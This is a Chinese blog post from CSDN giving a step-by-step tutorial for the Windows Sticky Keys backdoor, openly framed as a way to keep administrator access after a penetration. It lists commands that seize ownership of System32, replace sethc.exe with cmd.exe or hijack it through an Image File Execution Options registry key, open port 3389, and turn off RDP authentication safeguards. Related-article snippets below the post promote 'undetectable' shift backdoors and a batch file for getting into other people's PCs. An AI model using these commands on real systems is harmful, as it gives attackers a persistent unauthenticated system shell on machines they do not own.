沾滞键shift后门

最新推荐文章于 2024-03-14 14:58:18 发布
最新推荐文章于 2024-03-14 14:58:18 发布
阅读量1.5k 收藏 8
点赞数 1
分类专栏: WindowsOS 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/112480819
版权

目录

 

1. 简介

2. 后门原理

3. 后门制作

3.1 方法一 cmd覆盖sethc

3.2 方法二 利用注册表修改沾滞键快捷方式

4. shift后门利用

1. 简介

沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行system32下的sethc.exe,也就是启用了沾滞键。了解该方法的目的在于在完成渗透后能留下后门让攻击者一直拥有主机的管理员权限。

2. 后门原理

在C盘C:\Windows\System32目录下存在sethc.exe文件,正常情况下会执行sethc.exe文件,但是当我们将cmd.exe文件把sethc.exe文件通过更改名称给覆盖掉,当我们连续按下5次shift后执行的就是“cmd.exe”文件了。

3. 后门制作

3.1 方法一 cmd覆盖sethc

copy C:\WINDOWS\system32\cmd.exe​ C:\windows\system32\sethc.exe   //如果没指定生成的文件,会直接覆盖copy的第二个参数,相当于将第二个参数换成了第一个参数,但是文件外部名称没变

在cmd窗口,输入上面的命令可能出现拒绝访问。

出现上述情况需要将目录下的所有目录和文件、子目录下的所有者更改为管理员组(administrators)命令,

takeown  /f  c:\windows\system32\*.*  /a  /r  /d  y  # 获取整个文件夹及其下面子目录文件的所属权

cacls c:\windows\system32\*.* /T /E /G administrators:F # 将所有c:\windows\system32\目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制(删除原有NTFS权限设置)

注销后在登陆界面尝试调用cmd.exe命令行窗口

3.2 方法二 利用注册表修改沾滞键快捷方式

使用如下命令

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

该操作为添加注册表,引号内的内容为要将注册表项添加到"HKLM\......serhc.exe"

/v 是值名为Debugger 

/t 是类型为REG_SZ

/d 是数据为"C:\......\cmd.exe"

大致意思是在执行sethc.exe的时候会被cmd.exe给替代了

结果截图如下: 

4. shift后门利用

1.配置防火墙允许远程连接3389端口

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

 

2.开启远程桌面

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /D 0 /f

 

3.用户身份验证选项

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 

* 在最后参数“0”表示在会开启远程登陆验证,可以远程连接到锁屏登陆界面

* 当值为“1”时,使用远程连接工具携带凭证进行验证,不会看到锁屏登陆界面 

 

 4.安全层设置

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

* “0”是连接前使用 rdp 协议进行身份验证,rdp 即远程桌面连接

* “1”是指在连接前两端协商来进行身份验证,默认值也为“1”

* “2”是使用 tls 协议来进行

测试结果: 

总结一波:

总的来说该功能利用更多是在后渗透阶段,对于需要登陆主机,或者在web后门获取的shell上不能满足时。

 

Jietewang
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超强隐藏Shift后门
11-13
服务器留后门的招。 1、国内的很多机器都是简体中文版,所以我们一般选择 运行安装中文版shift.bat 2、按5次以上shift键,待弹出窗口后 3、点击设置 4、再点击取消,出现小text框 5、输入密码 helloyun 6、再点击设置 7、点击开启任务管理器 看到什么了? 哈哈 成功了 退出3389 管理员根本无法发现这个后门 因为和按5次以上shift键 一样的画面 此后门无比强大。 如果是繁体的执行另外一个bat即可
3389之永不查杀的后门shift后门代码
rundll64的专栏
10-02 3134
永不查杀的3389后门其原理就是利用shift后门,连敲5次shift键既可以直接进入服务器。 前些天在群里有个小伙伴问了一句谁知道shift后门的代码,当时我给了他一个链接,我总是觉得这个百度下就能找到吧,我查了一下,发现什么都有,有的不全有的要么复杂,我也搞不懂一个代码还不能认真的给我们吗?非要让大家赏你几根辣条! 好了废话不多说,将下面的代码通过服务器上的DOS命令下执行即可,觉
Windows粘滞键后门
最新发布
carmi的博客
03-14 498
此时假如该设备设置了这种粘滞键的话就可以通过调出cmd窗口(管理员状态)进行用户的创建,并将该用户归入到管理员组当中,就可以实现没有用户信息即可登入设备的操作——粘滞键后门。在C:/Windows/System32这个目录(系统进程的目录)下可找到粘滞键sethc这个应用程序(系统进程)。出现这种情况的原因是:由于刚刚已经将权限给到管理员,但管理员的权限始终未变化,所以还是不能修改文件名称(提高)。右键cmd属性打开发现Administrators这个组的成员根本没有对该文件的完全控制权限。
Windows后门--教程(五)——shift粘贴键后门
W小哥
03-16 3981
一、shift粘贴键后门介绍 Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。 (辅助功能镜像劫持是一样的原理) 二、shift粘贴键后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 靶机: windows Server2012 IP: 192.168.2
shift粘滞键后门创建/复原批处理
dcx3291777的博客
11-10 265
创建shift粘滞键后门: 1 c: 2 3 cd \Windows\System32\ 4 5 rename sethc.exe bak_sethc.exe 6 7 xcopy cmd.exe sethc.exe 8 9 exit 恢复原状态: c: cd \Windows\System32\ del sethc.exe ...
shift后门
mingyqf的博客
02-19 1861
参考:https://blog.csdn.net/qq_43626025/article/details/122031653 shift后门 替换C:\windows\system32\sethc.exe为你想要启动的后门程序,这里替换为我们用最常见的cmd.exe。 这里要注意下,默认情况下我们需要先改变sethc的所有者,然后修改用户权限不然的话没办法操作。 执行以下命令 Move C:\windows\system32\sethc.exeC:\windows\system32\sethc.exe.ba
windows图形化界)粘滞键后门
m0_60936698的博客
03-02 479
windows图形化界)粘滞键后门 思路:windows图形化界面未登入用户时,连按5次Shift键粘滞键的程序依然可以弹出,若若把粘滞键的程序改为其他程序则有不一样的效果(如cmd程序)。 一、手动直接修改文件名 ①在windows 中C:\Windows\System32下找到sethc.exe(辅助功能快捷键),发现无法直接修改文件名且提示《您需要TrustedInstaller提供的权限才能对此文件进行更改》,没有权限,权限属于另一个用户组。 ②在管理员权限下修改se.
粘滞键后门
sanqin_的博客
07-14 850
粘滞键后门原理效果流程实操 原理   cmd.exe 覆盖 sethc.exe sethc.exe:Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。 效果   连按五次shift会打开cmd,而不是sethc 流程 cmd操作流程 进入system32 目录 更改目录拥有者,归于管理员组 cacls 更改文件的权限,为后面操作做铺垫 更改文件属性,让管理员对目录完全控制 备份sethc.exe以防不测 cmd.exe覆盖sethc.exe,此
SHIFT后门
09-29
SHIFT后门
Shift后门.
07-22
Shift后门. ,源码可以自己改,很牛逼的东西,自己写的发出来分享一下
多语言版SHIFT后门
01-04
多语言版SHIFT后门 拿服务器得力工具
Shift后门(BAT版)
09-24
Shift后门(BAT版)附带BAT转EXE工具
粘滞键后门-自动创建-批处理版(axun)
11-25
很古老的漏洞了,这个太简单了,没什么好描述的,不知道粘滞键后门的自己上网查查
shift后门简单密码版
08-08
五次打开shift后门 运行时首先检查是否在系统目录下 如果不在运行时没反应 但是你运行一次后就可以用5次shift看看效果
五次SHIFT后门程序
05-15
五次SHIFT后门程序五次SHIFT后门程序五次SHIFT后门程序
WPS的shift键.docx
02-07
要用shift的标点打不出来,按shift会出现和点击鼠标右键一样的工具栏,如何关闭。 Shift+Delete键=剪切 Shift+Insert=粘贴 Shift+F10=鼠标右键 Shift+鼠标=准确选择大块文字
windows shift backdoor(windows shift 后门)
正在成为 code ape
01-28 1万+
This backdoor allows you to run command prompt (cmd.exe) with system privilege from the Windows 7 login screen. So with a system privilege command prompt in your hands, you can actually do a lot of st...
一个Shift后门程序,可以让你可以进入你不知道密码的电脑
热门推荐
杨启盛的博客
08-01 2万+
1.前提 你可以在平时亲身接触状态电脑,哪怕是在电脑主人不在的时候(虽然主人不在,或者关机了,进入电脑是要密码的)。 2.原理 利用电脑连续按5次Shift会触发粘滞键,它会运行c:\winows\system32\setchx.exe 3.Shift后门程序编写 将下面的内容保存成.bat后缀的文件,文件名你可以自己取,取的吸引人一点,他们就会点了,你懂的! 为了让别人不知道你这个程
vue键盘shift
09-11
在Vue中,可以使用键盘事件来响应按键的触发。对于Shift键,你可以使用`@keydown.shift`或`@keyup.shift`来绑定事件。例如,如果你想要在按下Shift键时执行某个方法,你可以这样写代码: ```html <template> <div> <input type="text" @keydown.shift="handleShiftKey" /> </div> </template> <script> export default { methods: { handleShiftKey() { // 在这里执行你的代码 console.log('Shift键被按下了'); } } } </script> ``` 这样,当用户按下Shift键时,`handleShiftKey`方法将被调用,并且你可以在方法中执行你想要的逻辑。引用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值